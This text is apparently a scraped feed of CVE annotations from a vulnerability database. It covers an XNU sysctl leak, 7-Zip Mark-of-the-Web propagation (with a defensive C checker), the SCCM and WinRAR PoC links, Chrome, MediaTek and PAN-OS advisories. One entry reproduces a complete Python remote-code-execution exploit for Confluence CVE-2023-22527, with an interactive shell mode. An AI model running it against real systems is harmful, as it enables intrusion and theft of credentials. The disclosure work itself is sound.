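    printf("buggy handler leaks: 0x%04X\n", leaked_bytes(sysctl_copyout_buggy));
    printf("fixed handler leaks: 0x%04X\n", leaked_bytes(sysctl_copyout_fixed));
    return 0;
}
```

The detection side of this is the same trick the PoC uses: hand the kernel a buffer larger than the documented value, pre-zeroed, and look for bytes that should have stayed zero.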

A particularly 'sus' sysctl in the XNU Kernel on cve-2024-54507
2 months ago by Cédric Bonhomme

Timeline

  • September 16, 2024: macOS 15.0 Sequoia was released with xnu-11215.1.10, the first public kernel release with this bug.
  • Fall 2024: I reported this bug to Apple.
  • December 11, 2024: macOS 15.2 and iOS 18.2 were released, fixing this bug, and assigning CVE-2024-54507 to this issue.


{
   uuid: "fa8ceb01-4bdc-4f10-8a64-5a1b671dc259",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "A particularly 'sus' sysctl in the XNU Kernel",
   description: "### Timeline\n\n* September 16, 2024: macOS 15.0 Sequoia was released with xnu-11215.1.10, the first public kernel release with this bug.\n* Fall 2024: I reported this bug to Apple.\n* December 11, 2024: macOS 15.2 and iOS 18.2 were released, fixing this bug, and assigning CVE-2024-54507 to this issue.\n",
   description_format: "markdown",
   vulnerability: "CVE-2024-54507",
   creation_timestamp: "2025-01-24T06:18:07.537395+00:00",
   timestamp: "2025-01-24T06:18:07.537395+00:00",
   related_vulnerabilities: [
      "CVE-2024-54507",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
   ],
}

cve-2024-54507

7-Zip File Manager didn't propagate Zone.Identifier stream for extracted files from nested archives on cve-2025-0411
2 months ago by Alexandre Dulaunoy

24.09          2024-11-29
-------------------------
- The default dictionary size values for LZMA/LZMA2 compression methods were increased:
         dictionary size   compression level
  v24.08  v24.09  v24.09
          32-bit  64-bit
    8 MB   16 MB   16 MB   -mx4
   16 MB   32 MB   32 MB   -mx5 : Normal
   32 MB   64 MB   64 MB   -mx6
   32 MB   64 MB  128 MB   -mx7 : Maximum
   64 MB   64 MB  256 MB   -mx8
   64 MB   64 MB  256 MB   -mx9 : Ultra
  The default dictionary size values for 32-bit versions of LZMA/LZMA2 don't exceed 64 MB.
- 7-Zip now can calculate the following hash checksums: SHA-512, SHA-384, SHA3-256 and MD5.
- APM and HFS support was improved.
- If an archive update operation uses a temporary archive folder and
  the archive is moved to the destination folder, 7-Zip shows the progress of moving
  the archive file, as this operation can take a long time if the archive is large.
- The bug was fixed: 7-Zip File Manager didn't propagate Zone.Identifier stream
  for extracted files from nested archives (if there is open archive inside another open archive).
- Some bugs were fixed.

https://sourceforge.net/p/sevenzip/discussion/45797/thread/b95432c7ac/


{
   uuid: "ffe0aeca-4687-4168-a295-b0334927e4c5",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "7-Zip File Manager didn't propagate Zone.Identifier stream   for extracted files from nested archives",
   description: "~~~\n24.09          2024-11-29\n-------------------------\n- The default dictionary size values for LZMA/LZMA2 compression methods were increased:\n         dictionary size   compression level\n  v24.08  v24.09  v24.09\n          32-bit  64-bit\n    8 MB   16 MB   16 MB   -mx4\n   16 MB   32 MB   32 MB   -mx5 : Normal\n   32 MB   64 MB   64 MB   -mx6\n   32 MB   64 MB  128 MB   -mx7 : Maximum\n   64 MB   64 MB  256 MB   -mx8\n   64 MB   64 MB  256 MB   -mx9 : Ultra\n  The default dictionary size values for 32-bit versions of LZMA/LZMA2 don't exceed 64 MB.\n- 7-Zip now can calculate the following hash checksums: SHA-512, SHA-384, SHA3-256 and MD5.\n- APM and HFS support was improved.\n- If an archive update operation uses a temporary archive folder and\n  the archive is moved to the destination folder, 7-Zip shows the progress of moving\n  the archive file, as this operation can take a long time if the archive is large.\n- The bug was fixed: 7-Zip File Manager didn't propagate Zone.Identifier stream\n  for extracted files from nested archives (if there is open archive inside another open archive).\n- Some bugs were fixed.\n~~~\n\n[https://sourceforge.net/p/sevenzip/discussion/45797/thread/b95432c7ac/](https://sourceforge.net/p/sevenzip/discussion/45797/thread/b95432c7ac/)",
   description_format: "markdown",
   vulnerability: "CVE-2025-0411",
   creation_timestamp: "2025-01-23T07:14:02.895881+00:00",
   timestamp: "2025-01-23T07:14:02.895881+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

cve-2025-0411
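The changelog line matters because Zone.Identifier is the NTFS alternate data stream that carries the Mark of the Web; a file unpacked from an archive nested inside a downloaded archive that loses the stream is opened without the SmartScreen and Protected View checks that the mark triggers. The following C example is added here and is not 7-Zip code: it parses the text of a Zone.Identifier stream as Windows writes it, computes the zone a file should inherit through a chain of nested archives, and checks whether an extracted file's stream preserves it. The sample streams are constructed; on Windows the stream text itself can be read with `Get-Content -Stream Zone.Identifier`.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parse the text of a Zone.Identifier alternate data stream as Windows
 * writes it ("[ZoneTransfer]\r\nZoneId=3\r\n...") and return the ZoneId:
 * 0 local machine, 1 intranet, 2 trusted, 3 internet, 4 restricted.
 * Returns -1 if the stream is absent (NULL) or carries no valid ZoneId. */
int parse_zone_id(const char *stream) {
    if (stream == NULL)
        return -1;
    const char *p = stream;
    while (*p) {
        const char *eol = strpbrk(p, "\r\n");
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        if (len > 7 && strncmp(p, "ZoneId=", 7) == 0) {
            char *end;
            long id = strtol(p + 7, &end, 10);
            return (end != p + 7 && id >= 0 && id <= 4) ? (int)id : -1;
        }
        p += len;
        while (*p == '\r' || *p == '\n')
            p++;
    }
    return -1;
}

/* Zone an extracted file must inherit: the least trusted (highest) zone of
 * every archive it was unpacked through. A -1 entry means "no stream" and
 * must not launder an outer mark. */
int inherited_zone(const int *chain, size_t n) {
    int zone = -1;
    for (size_t i = 0; i < n; i++)
        if (chain[i] > zone)
            zone = chain[i];
    return zone;
}

/* Defender's check after extracting outer archive -> inner archive -> file:
 * 1 if the extracted file's stream is at least as restrictive as the zone
 * it should have inherited, 0 if the mark was dropped or downgraded. */
int motw_preserved(const char *outer_stream, const char *inner_stream,
                   const char *extracted_stream) {
    int chain[2] = { parse_zone_id(outer_stream), parse_zone_id(inner_stream) };
    return parse_zone_id(extracted_stream) >= inherited_zone(chain, 2);
}

/* Constructed sample streams, not taken from any real file. */
static const char *outer_zip_stream =
    "[ZoneTransfer]\r\nZoneId=3\r\nReferrerUrl=https://example.invalid/\r\n"
    "HostUrl=https://example.invalid/outer.zip\r\n";
static const char *inner_zip_stream = NULL;   /* nested archive has no stream of its own */
static const char *good_extract = "[ZoneTransfer]\r\nZoneId=3\r\n";
static const char *bad_extract = NULL;        /* the pre-24.09 behaviour: stream not propagated */
static const int sample_chain[2] = { 3, -1 };

int main(void) {
    printf("outer zone: %d, inherited through nesting: %d\n",
           parse_zone_id(outer_zip_stream), inherited_zone(sample_chain, 2));
    printf("extraction that keeps the mark: %d\n",
           motw_preserved(outer_zip_stream, inner_zip_stream, good_extract));
    printf("nested extraction that drops the stream: %d\n",
           motw_preserved(outer_zip_stream, inner_zip_stream, bad_extract));
    return 0;
}
```

The rule encoded in `inherited_zone` is the one the fix restores: an inner archive that was never on disk has no stream, and that absence must not turn an internet-zone download into a local file.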

PoC - Microsoft Configuration Manager (ConfigMgr / SCCM) 2403 Unauthenticated SQL injections (CVE-2024-43468) exploit on cve-2024-43468
2 months ago by Alexandre Dulaunoy

Microsoft Configuration Manager (ConfigMgr / SCCM) 2403 Unauthenticated SQL injections (CVE-2024-43468) exploit


{
   uuid: "aea0fc6c-fa3d-4e98-aef1-a25b364fb2fe",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "PoC - Microsoft Configuration Manager (ConfigMgr / SCCM) 2403 Unauthenticated SQL injections (CVE-2024-43468) exploit",
   description: "[Microsoft Configuration Manager (ConfigMgr / SCCM) 2403 Unauthenticated SQL injections (CVE-2024-43468) exploit](https://github.com/synacktiv/CVE-2024-43468)\n",
   description_format: "markdown",
   vulnerability: "CVE-2024-43468",
   creation_timestamp: "2025-01-21T15:32:07.384792+00:00",
   timestamp: "2025-01-21T15:32:07.384792+00:00",
   related_vulnerabilities: [
      "CVE-2024-43468",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=PoC",
         ],
      },
   ],
}

cve-2024-43468

POC for CVE-2023-22527 (Confluence SSTI) - Struts2 on cve-2023-22527
2 months ago by Alexandre Dulaunoy

import requests
import argparse


class exploit:
    def __init__(self, url):
        self.url = url

    def rce(self, cmd='', header='Ret-rce'):
        # OGNL injection through the 'label' parameter of the unauthenticated
        # text-inline.vm Velocity template: \u0027 is a single quote and %2b a
        # plus sign, so the template string is closed and an OGNL expression is
        # concatenated in. It evaluates the 'x' parameter, which writes the
        # command output directly into the HTTP response.
        data = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d'
                '.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027'
                '&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter()'
                '.write((new freemarker.template.utility.Execute()).exec({"' + cmd + '"}))\r\n')

        r = requests.post(f'{self.url}/template/aui/text-inline.vm', data=data, headers={
                'Connection': 'close',
                'Content-Type': 'application/x-www-form-urlencoded',
                'Content-Length': str(len(data))
            }
        )
        # The command output is written before the template's own HTML.
        return r.text.split('<!DOCTYPE html>')[0].strip()

    def get_env(self):
        return self.rce(cmd='env')

    def shell(self):
        print('[DEBUG] Spawning semi-interactive shell ..')
        while 1:
            cmd = input('$ ')
            result = self.rce(cmd)
            print(result)


def parse_args():
    parser = argparse.ArgumentParser(add_help=True, description='This is a POC for CVE-2023-22527 (Confluence SSTI)')
    parser.add_argument("-u", dest="url", type=str, required=True, help="Url")
    parser.add_argument("-c", dest="command", type=str, required=False, default=None, help="Command")
    parser.add_argument("-e", dest="env", action="store_true", required=False, default=False, help="Get environment vars")
    parser.add_argument("-i", dest="interactive", action="store_true", required=False, default=False, help="Interactive mode")
    return parser.parse_args()


def main(args):
    if args.command is None and not args.env and not args.interactive:
        print('[ERROR] Please provide a command using -c option')
        return

    exp = exploit(url=args.url)

    if args.env:
        res = exp.get_env()
        print(res)

    if args.command:
        res = exp.rce(args.command)
        print(res)

    if args.interactive:
        exp.shell()


if __name__ == '__main__':
    args = parse_args()
    main(args=args)


{
   uuid: "a58dda1d-0763-4d89-ad38-22d86eb55d6a",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "POC for CVE-2023-22527 (Confluence SSTI) - Struts2",
   description: "~~~python\nimport requests\nimport argparse\n\nclass exploit:\n\tdef __init__(self, url):\n\t\tself.url = url\n\n\tdef rce(self, cmd='', header='Ret-rce'):\n\n\t\tdata = 'label=\\\\u0027%2b#request\\\\u005b\\\\u0027.KEY_velocity.struts2.context\\\\u0027\\\\u005d.internalGet(\\\\u0027ognl\\\\u0027).findValue(#parameter\ns.x,{})%2b\\\\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({\"'+cmd+'\"}))\\r\\\nn'\n\t\t\n\t\tr = requests.post(f'{self.url}/template/aui/text-inline.vm', data=data, headers = {\n\t\t\t    'Connection': 'close',\n\t\t\t    'Content-Type': 'application/x-www-form-urlencoded',\n\t\t\t    'Content-Length': str(len(data))\n\t\t\t}\n\t\t)\n\t\treturn r.text.split('<!DOCTYPE html>')[0].strip()\n\n\tdef get_env(self):\n\t\treturn self.rce(cmd='env')\n\n\tdef shell(self):\n\t\tprint('[DEBUG] Spawning semi-interactive shell ..')\n\t\twhile 1:\n\t\t\tcmd = input('$ ')\n\t\t\tresult = self.rce(cmd)\n\t\t\tprint(result)\n\n\n\ndef parse_args():\n\tparser = argparse.ArgumentParser(add_help=True, description='This is a POC for CVE-2023-22527 (Confluence SSTI)')\n\tparser.add_argument(\"-u\",dest=\"url\",type=str,required=False, help=\"Url\")\n\tparser.add_argument(\"-c\",dest=\"command\",type=str,required=False, default=None,help=\"Command\")\n\tparser.add_argument(\"-e\",dest=\"env\",action=\"store_true\",required=False,default=False, help=\"Get environnement vars\")\n\tparser.add_argument(\"-i\",dest=\"interactive\",action=\"store_true\",required=False,default=False, help=\"Interactive mod\")\n\treturn parser.parse_args()\n\ndef main(args):\n\tif args.command is None and not args.env and not args.interactive:\n\t\tprint('[ERROR] Please provide a command using -c option')\n\n\texp = exploit(url = args.url)\n\n\tif args.env:\n\t\tres = exp.get_env()\n\t\tprint(res)\n\n\tif args.command:\n\t\tres = exp.rce(args.command)\n\t\tprint(res)\n\n\tif 
args.interactive:\n\t\texp.shell()\n\nif __name__ == '__main__':\n\targs = parse_args()\n\tmain(args = args)\n\n~~~",
   description_format: "markdown",
   vulnerability: "CVE-2023-22527",
   creation_timestamp: "2025-01-17T21:29:08.826577+00:00",
   timestamp: "2025-01-17T21:29:08.826577+00:00",
   related_vulnerabilities: [
      "CVE-2023-22527",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=PoC",
         ],
      },
   ],
}

cve-2023-22527

CVE-2023-4047 PoC By Wild Pointer on cve-2023-4047
2 months ago by Alexandre Dulaunoy


{
   uuid: "714ff721-cfd1-4d52-8dd7-18df34e59ed5",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "CVE-2023-4047 PoC By Wild Pointer",
   description: "- [https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC](https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC)",
   description_format: "markdown",
   vulnerability: "CVE-2023-4047",
   creation_timestamp: "2025-01-17T21:26:39.418096+00:00",
   timestamp: "2025-01-17T21:26:39.418096+00:00",
   related_vulnerabilities: [
      "CVE-2023-40477",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=PoC",
         ],
      },
   ],
}

cve-2023-4047

Fortigate Belsen Leak - parser from @cudeso@infosec.exchange on cve-2022-40684
2 months ago by Cédric Bonhomme

A quick parser to extract whois and country data from the darkweb forum post listing Fortinet devices victim to CVE-2022-40684.

Parser available at:

https://github.com/cudeso/tools/tree/master/CVE-2022-40684


{
   uuid: "ad2fd548-18b4-43c1-af5f-c72c3096c2a7",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Fortigate Belsen Leak - parser from @cudeso@infosec.exchange",
   description: "A quick parser to extract whois and country data from the darkweb forum post listing Fortinet devices victim to CVE-2022-40684.\n\nParser available at:\n\n[https://github.com/cudeso/tools/tree/master/CVE-2022-40684](https://github.com/cudeso/tools/tree/master/CVE-2022-40684)",
   description_format: "markdown",
   vulnerability: "CVE-2022-40684",
   creation_timestamp: "2025-01-16T16:05:29.258596+00:00",
   timestamp: "2025-01-17T05:35:29.380347+00:00",
   related_vulnerabilities: [
      "CVE-2022-40684",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=annotation",
         ],
      },
      {
         ref: [
            "https://github.com/arsolutioner/fortigate-belsen-leak",
            "https://www.linkedin.com/feed/update/urn:li:activity:7285685375585443841/",
            "https://github.com/cudeso/tools/tree/master/CVE-2022-40684",
         ],
      },
   ],
}

cve-2022-40684

Stable Channel Update for Desktop Tuesday, January 7, 2025 on cve-2025-0291
3 months ago by Alexandre Dulaunoy

The Stable channel has been updated to 131.0.6778.264/.265 for Windows, Mac and 131.0.6778.264 for Linux which will roll out over the coming days/weeks. A full list of changes in this build is available in the Log.

Security Fixes and Rewards

Note: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.

This update includes 4 security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the Chrome Security Page for more information.

383356864 High CVE-2025-0291: Type Confusion in V8. Reported by Popax21 on 2024-12-11

We would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel. As usual, our ongoing internal security work was responsible for a wide range of fixes:

  • [388088544] Various fixes from internal audits, fuzzing and other initiatives

Many of our security bugs are detected using AddressSanitizer, MemorySanitizer, UndefinedBehaviorSanitizer, Control Flow Integrity, libFuzzer, or AFL.

Reference: https://chromereleases.googleblog.com/2025/01/stable-channel-update-for-desktop.html


{
   uuid: "277659d5-c63c-4885-a40f-c84aa253dad8",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Stable Channel Update for Desktop Tuesday, January 7, 2025",
   description: "The Stable channel has been updated to 131.0.6778.264/.265 for Windows, Mac and 131.0.6778.264 for Linux which will roll out over the coming days/weeks. A full list of changes in this build is available in the Log.\n\nSecurity Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.\n\nThis update includes 4 security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the Chrome Security Page for more information.\n\n[383356864](https://issues.chromium.org/issues/383356864) High CVE-2025-0291: Type Confusion in V8. Reported by Popax21 on 2024-12-11\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.As usual, our ongoing internal security work was responsible for a wide range of fixes:\n- [388088544] Various fixes from internal audits, fuzzing and other initiatives\n\nMany of our security bugs are detected using AddressSanitizer, MemorySanitizer, UndefinedBehaviorSanitizer, Control Flow Integrity, libFuzzer, or AFL.\n\nReference: [https://chromereleases.googleblog.com/2025/01/stable-channel-update-for-desktop.html](https://chromereleases.googleblog.com/2025/01/stable-channel-update-for-desktop.html)",
   description_format: "markdown",
   vulnerability: "CVE-2025-0291",
   creation_timestamp: "2025-01-08T07:56:13.906692+00:00",
   timestamp: "2025-01-08T07:56:13.906692+00:00",
   related_vulnerabilities: [
      "CVE-2025-0291",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=annotation",
         ],
      },
   ],
}

cve-2025-0291

MediaTek/Android 2025-01 Security bulletins - Users are strongly encouraged to check for updates on cve-2024-20144
3 months ago by Cédric Bonhomme

MediaTek has notified device manufacturers (OEMs) about these vulnerabilities and provided corresponding security patches.

Users are strongly encouraged to check for updates from their device manufacturers and apply them as soon as possible to mitigate these security risks.

See bundle: https://vulnerability.circl.lu/bundle/a30ff14f-a073-49be-8c0c-6b6afd6a19f3

Various Android devices are impacted.


{
   uuid: "91d8f53c-7fde-47d2-b81a-ec31c1db425e",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "MediaTek/Android 2025-01 Security bulletins - Users are strongly encouraged to check for updates",
   description: "MediaTek has notified device manufacturers (OEMs) about these vulnerabilities and provided corresponding security patches.\n\nUsers are strongly encouraged to check for updates from their device manufacturers and apply them as soon as possible to mitigate these security risks.\n\nSee bundle: https://vulnerability.circl.lu/bundle/a30ff14f-a073-49be-8c0c-6b6afd6a19f3\n\nVarious Android devides are impacted.",
   description_format: "markdown",
   vulnerability: "CVE-2024-20144",
   creation_timestamp: "2025-01-07T07:24:43.588311+00:00",
   timestamp: "2025-01-07T07:24:43.588311+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

cve-2024-20144

PaloAlto - CVE-2024-3393 PAN-OS: Firewall Denial of Service (DoS) in DNS Security Using a Specially Crafted Packet on cve-2024-3393
3 months ago by Alexandre Dulaunoy

CVE-2024-3393 PAN-OS: Firewall Denial of Service (DoS) in DNS Security Using a Specially Crafted Packet

Ref: https://security.paloaltonetworks.com/CVE-2024-3393

A Denial of Service vulnerability in the DNS Security feature of Palo Alto Networks PAN-OS software allows an unauthenticated attacker to send a malicious packet through the data plane of the firewall that reboots the firewall. Repeated attempts to trigger this condition will cause the firewall to enter maintenance mode.

See the Solution section for additional fixes to commonly deployed maintenance releases.

DNS Security logging must be enabled for this issue to affect PAN-OS software.

Palo Alto Networks is aware of customers experiencing this denial of service (DoS) when their firewall blocks malicious DNS packets that trigger this issue.

This issue is fixed in PAN-OS 10.1.14-h8, PAN-OS 10.2.10-h12, PAN-OS 11.1.5, PAN-OS 11.2.3, and all later PAN-OS versions.

Note: PAN-OS 11.0 reached the end of life (EOL) on November 17, 2024, so we do not intend to provide a fix for this release.

Prisma Access customers using DNS Security with affected PAN-OS versions should apply one of the workarounds provided below. We will perform upgrades in two phases for impacted customers on the weekends of January 3rd and January 10th. You can request an expedited Prisma Access upgrade to the latest PAN-OS version by opening a support case.

In addition, to provide the most seamless upgrade path for our customers, we are making fixes available for other TAC-preferred and commonly deployed maintenance releases.

Remember to revert the Log Severity settings once the fixes are applied.

Until we perform an upgrade of your Prisma Access tenant, you can disable DNS Security logging across all NGFWs in your tenant by opening a support case. If you would like to expedite the upgrade, please make a note of that in the support case.

cpe:2.3:o:paloaltonetworks:pan-os:11.2.2:h2:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.2.2:h1:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.2.1:h1:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.2.1:-:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.2.0:h1:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.2.0:-:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.2:-:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h9:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h8:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h7:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h6:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h5:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h4:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h3:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h2:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h1:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:-:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h11:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h10:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h9:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h8:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h7:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h6:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h5:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h4:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h3:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h2:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h1:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.3:-:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h15:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h14:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h13:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h12:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h11:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h10:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h9:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h8:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h7:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h6:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h5:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h4:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h3:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h2:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h1:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.2:-:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.1:h2:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.1:h1:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.1:-:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.0:h4:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.0:h3:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.0:h2:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.0:h1:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1.0:-:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:11.1:-:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h10:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h9:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h8:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h7:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h6:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h5:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h4:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h3:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h2:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h1:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:-:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h18:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h17:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h16:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h15:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h14:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h13:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h12:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h11:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h10:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h9:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h8:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h7:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h6:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h5:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h4:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h3:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h2:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h1:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:-:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h18:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h17:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h16:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h15:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h14:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h13:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h12:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h11:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h10:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h9:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h8:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h7:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h6:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h5:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h4:*:*:*:*:*:*

